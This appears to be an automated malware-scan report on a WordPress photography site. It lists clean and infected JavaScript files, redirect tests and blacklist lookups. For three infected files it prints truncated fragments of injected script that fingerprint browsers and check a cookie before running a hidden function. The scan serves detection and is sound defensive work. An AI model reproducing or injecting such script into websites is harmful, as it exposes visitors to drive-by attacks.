Scanned pages/files
Request | Server response | Status |
http://www.sarahcameronphotography.co.uk/ | 200 OK Content-Length: 28190 Content-Type: text/html | clean |
http://www.sarahcameronphotography.co.uk/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-includes/js/utils.min.js?ver=3.9.2 | 200 OK Content-Length: 1739 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.9.2 | 200 OK Content-Length: 33 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=3.9.2 | 200 OK Content-Length: 24995 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=3.9.2 | 200 OK Content-Length: 5337 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=3.9.2 | 200 OK Content-Length: 891 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=3.9.2 | 200 OK Content-Length: 890 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-content/plugins/dd-formmailer/date_chooser.js | 200 OK Content-Length: 17786 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight iFrameDiv.style.width = pickerDiv.offsetWidth; iFrameDiv.style.height = pickerDiv.offsetHeight ; iFrameDiv.style.top = pickerDiv.style.top; iFrameDiv.style.left = pickerDiv.style.left; iFrameDiv.style.zIndex = pickerDiv.style.zIndex - 1; iFrameDiv.style.visibility = pickerDiv.style.visibility ; iFrameDiv.style.display = pickerDiv.style.display; } catch(e) { } } catch (ee) { } } Antivirus reports:
| ||
http://www.sarahcameronphotography.co.uk/wp-content/themes/sarahcameron/js/bjqs.js | 200 OK Content-Length: 25381 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight $slider.css({'left': -state.slidewidth *(state.slidecount - 2)}); state.currentslide = state.slidecount - 1; state.currentindex = state.slidecount - 2; } state.animating = false; }); } } }; init(); }; })(jQuery); Antivirus reports:
| ||
http://www.sarahcameronphotography.co.uk/wp-content/themes/sarahcameron/js/css_browser_selector.js | 200 OK Content-Length: 2376 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight Antivirus reports:
| ||
http://www.sarahcameronphotography.co.uk/wp-includes/js/hoverIntent.min.js?ver=r7 | 200 OK Content-Length: 1116 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-admin/js/common.min.js?ver=3.9.2 | 200 OK Content-Length: 11478 Content-Type: application/javascript | clean |
http://www.sarahcameronphotography.co.uk/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sarahcameronphotography.co.uk
Result:
GET / HTTP/1.1
Host: sarahcameronphotography.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: sarahcameronphotography.co.uk
Referer: http://www.google.com/search?q=sarahcameronphotography.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sarahcameronphotography.co.uk
Referer: http://www.google.com/search?q=sarahcameronphotography.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sarahcameronphotography.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sarahcameronphotography.co.uk/
Result: sarahcameronphotography.co.uk is not infected or malware details are not published yet.
Result: sarahcameronphotography.co.uk is not infected or malware details are not published yet.